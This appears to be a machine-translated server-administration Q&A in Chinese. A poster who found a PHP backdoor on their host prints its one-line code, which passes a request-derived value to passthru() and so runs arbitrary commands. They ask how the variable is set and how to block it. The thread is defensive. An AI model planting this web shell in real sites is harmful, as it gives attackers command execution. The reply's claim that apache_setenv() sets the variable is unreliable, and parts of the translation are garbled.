Intereting Posts

停止使用Azure AD Sync同步个人属性 Windows Server 2008 r2 IIS：不能在请求筛选中允许访问文件扩展名与realmd / sssd和AD集成共享文件夹具有function分支的部署工具我应该使用哪一个？ Web服务器如何处理可疑的DoS攻击？如何在同一用户（而不是root）下创build文件/目录时增加用户权限？为什么上传到S3这么慢？ httpd服务器变慢，然后出现无响应如何克隆RAID5系统 OpenWrt日志logging：如何找出“wifi deauthentication” 高请求时间连接到不同域上的共享时，不会提示input凭据支持带宽上限的Windows VPN服务器软件为特定IP的所有程序和端口打开Windows 2008防火墙的风险有多大？

PHP后门代码

我在主机上find了一个php后门程序。

<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>

我看到访问日志中的请求，该PHP文件是POST请求，但我不知道该variables的SETENV如何设置; 有人可以解释如何设置这样的variables，如果可能的话，我可以在服务器端限制/禁止设置这些variables。

谢谢

-H。

它由apache_setenv();设置apache_setenv();

search

 apache_setenv("HTTP_ACCEPT_TROL

要么

 apache_setenv('HTTP_ACCEPT_TROL

你会find你的答案